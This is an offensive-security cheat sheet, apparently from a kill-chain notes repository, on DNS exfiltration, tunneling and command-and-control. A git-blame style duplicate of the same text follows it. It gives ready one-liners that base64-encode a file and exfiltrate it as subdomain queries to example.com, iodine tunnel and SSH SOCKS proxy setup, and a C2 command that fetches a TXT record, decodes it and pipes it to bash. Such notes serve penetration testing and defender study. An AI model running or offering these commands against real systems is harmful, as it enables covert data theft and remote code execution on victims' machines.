killchain-compendium/Exfiltration/DNS.md

# DNS

* [Root Servers](https://www.iana.org/domains/root/servers)
* [Zones](https://www.cloudflare.com/learning/dns/glossary/dns-zone/)
* [Records](https://www.cloudflare.com/learning/dns/dns-records/)

## Queries

### nslookup

```sh
nslookup type=txt <domain>
```

### Reverse lookup

* Stored inside `PTR` record
* Reverse IP may look like `<IP>.in-addr.arpa.`, but not via `drill` or `dig`
```sh
drill -x +short <IP>
```

## Exfiltration

* Add data to UDP DNS requests
* Capture traffic on an owned DNS server
* `253` is the max length of a DNS name, excluding dots
* `63` is the mx length of subdomains
* Encode the payload to hide it 

## Infiltration

* Inside `TXT` or any other possible records

## Usage

### Manual Tunneling

Preconditions are:
    1. Domain with an `A` record
    2. `NS` record to controlled DNS to resolve the domain query

* Attach the encoded payload as the subdomain
```sh
base64 -w0 <payload.txt> | fold -w 24 | sed -r 's/.*/&.example.com/'
```

* Query the DNS server
```sh
base64 -w0 <payload.txt> | fold -w 24 | sed -r 's/.*/&.example.com/' | awk '{print "dig +short $1"}' | bash
```

* Optionally putting the payload in a single query via
```sh
base64 -w0 <payload.txt> | fold -w 24 | sed 's/.*/&./' | tr -d '\n' | sed 's/$/example.com/' | awk '{print "dig +short" $1}' | bash
```

* Decode received data on the controlled DNS server via
```sh
echo "DomainBase64encoded.example.com" | sed 's/\.example\.com//;s/\.//g' | base64 -d
```

### Tunneling via Iodine

* [Tunnel IPv4 Data through DNS](https://github.com/yarrick/iodine.git)
* Encapsulate protocols in side the DNS tunnel

* Start server on an outside DNS server. This may be a evs.
```sh 
iodined -b <optionalListeningPort> -f 10.0.0.1</optionalCIDR> -c -P <optionalPassword> tunnel.test.com
```

* Use client via
```sh
iodine -f -r <optionalServer-IP> -P <optionlPassword>  tunnel.test.com
```

* `NS` record of the owned domain should contain the subdomain, e.g. `tunnel.test.com`
* Client gets a tunnel IP in the range of `10.0.0.0/8`
* Check connection via 
```sh
ping <server-IP>
```

* Generate ssh-key and put in on the server
* Dynamic port forwarding to the network through the server as a proxy via ssh
```sh
ssh <user>@10.0.0.1 -4 -f -N -D <8080/1080>
```

* User proxy server on the client's web server like `--proxy-server` or use a SOCKS proxy like FoxyProxy, or proxychains
```sh
proxychains curl http://$TARGET_IP/
curl --socks5 localhost:1080 http://$
```
    
### C2 over DNS

* Preconditions are the same as [Manual Tunneling](#Manual Tunneling)
    * Plus: Data to control the appliances will be put into `TXT` record
    * Data to control the appliances may be a shell script sending payloads via ICMP data field, DNS subdomains or execute something locally on the target

* Encode the payload and add it as `TXT` record
```sh
base64 ./script.sh
```

* Query and execute on target
```sh
dig +short -t TXT script.example.com | sed 's/\"//g'| base64 -d | bash
```
bump 2021-10-31 02:43:24 +02:00			`# DNS`

			`* [Root Servers](https://www.iana.org/domains/root/servers)`
			`* [Zones](https://www.cloudflare.com/learning/dns/glossary/dns-zone/)`
			`* [Records](https://www.cloudflare.com/learning/dns/dns-records/)`

bump 2022-08-30 22:16:10 +02:00			`## Queries`

			`### nslookup`

			```sh
			`nslookup type=txt <domain>`
			```

			`### Reverse lookup`

			* Stored inside `PTR` record
			* Reverse IP may look like `<IP>.in-addr.arpa.`, but not via `drill` or `dig`
			```sh
			`drill -x +short <IP>`
			```

			`## Exfiltration`

			`* Add data to UDP DNS requests`
			`* Capture traffic on an owned DNS server`
			* `253` is the max length of a DNS name, excluding dots
			* `63` is the mx length of subdomains
			`* Encode the payload to hide it`

			`## Infiltration`

			* Inside `TXT` or any other possible records

			`## Usage`

			`### Manual Tunneling`

			`Preconditions are:`
			1. Domain with an `A` record
			2. `NS` record to controlled DNS to resolve the domain query

			`* Attach the encoded payload as the subdomain`
			```sh
			`base64 -w0 <payload.txt> \| fold -w 24 \| sed -r 's/.*/&.example.com/'`
			```

			`* Query the DNS server`
			```sh
			`base64 -w0 <payload.txt> \| fold -w 24 \| sed -r 's/.*/&.example.com/' \| awk '{print "dig +short $1"}' \| bash`
			```

			`* Optionally putting the payload in a single query via`
			```sh
			`base64 -w0 <payload.txt> \| fold -w 24 \| sed 's/.*/&./' \| tr -d '\n' \| sed 's/$/example.com/' \| awk '{print "dig +short" $1}' \| bash`
			```

			`* Decode received data on the controlled DNS server via`
			```sh
			`echo "DomainBase64encoded.example.com" \| sed 's/\.example\.com//;s/\.//g' \| base64 -d`
			```

			`### Tunneling via Iodine`

bump 2021-10-31 02:43:24 +02:00			`* [Tunnel IPv4 Data through DNS](https://github.com/yarrick/iodine.git)`
bump 2022-08-30 22:16:10 +02:00			`* Encapsulate protocols in side the DNS tunnel`

bump 2021-10-31 02:43:24 +02:00			`* Start server on an outside DNS server. This may be a evs.`
			```sh
bump 2022-08-30 22:16:10 +02:00			`iodined -b <optionalListeningPort> -f 10.0.0.1</optionalCIDR> -c -P <optionalPassword> tunnel.test.com`
bump 2021-10-31 02:43:24 +02:00			```
bump 2022-08-30 22:16:10 +02:00
bump 2021-10-31 02:43:24 +02:00			`* Use client via`
			```sh
bump 2022-08-30 22:16:10 +02:00			`iodine -f -r <optionalServer-IP> -P <optionlPassword> tunnel.test.com`
bump 2021-10-31 02:43:24 +02:00			```
bump 2022-08-30 22:16:10 +02:00
bump 2021-10-31 02:43:24 +02:00			* `NS` record of the owned domain should contain the subdomain, e.g. `tunnel.test.com`
			* Client gets a tunnel IP in the range of `10.0.0.0/8`
			`* Check connection via`
			```sh
			`ping <server-IP>`
			```
bump 2022-08-30 22:16:10 +02:00
bump 2021-10-31 02:43:24 +02:00			`* Generate ssh-key and put in on the server`
bump 2022-08-30 22:16:10 +02:00			`* Dynamic port forwarding to the network through the server as a proxy via ssh`
bump 2021-10-31 02:43:24 +02:00			```sh
bump 2022-08-30 22:16:10 +02:00			`ssh <user>@10.0.0.1 -4 -f -N -D <8080/1080>`
bump 2021-10-31 02:43:24 +02:00			```

bump 2022-08-30 22:16:10 +02:00			* User proxy server on the client's web server like `--proxy-server` or use a SOCKS proxy like FoxyProxy, or proxychains
bump 2021-10-31 02:43:24 +02:00			```sh
bump 2022-08-30 22:16:10 +02:00			`proxychains curl http://$TARGET_IP/`
			`curl --socks5 localhost:1080 http://$`
bump 2021-10-31 02:43:24 +02:00			```
bump 2022-08-30 22:16:10 +02:00
			`### C2 over DNS`
bump 2021-10-31 02:43:24 +02:00
bump 2022-08-30 22:16:10 +02:00			`* Preconditions are the same as [Manual Tunneling](#Manual Tunneling)`
			* Plus: Data to control the appliances will be put into `TXT` record
			`* Data to control the appliances may be a shell script sending payloads via ICMP data field, DNS subdomains or execute something locally on the target`

			* Encode the payload and add it as `TXT` record
bump 2021-10-31 02:43:24 +02:00			```sh
bump 2022-08-30 22:16:10 +02:00			`base64 ./script.sh`
bump 2021-10-31 02:43:24 +02:00			```

bump 2022-08-30 22:16:10 +02:00			`* Query and execute on target`
			```sh
			`dig +short -t TXT script.example.com \| sed 's/\"//g'\| base64 -d \| bash`
			```
bump 2021-10-31 02:43:24 +02:00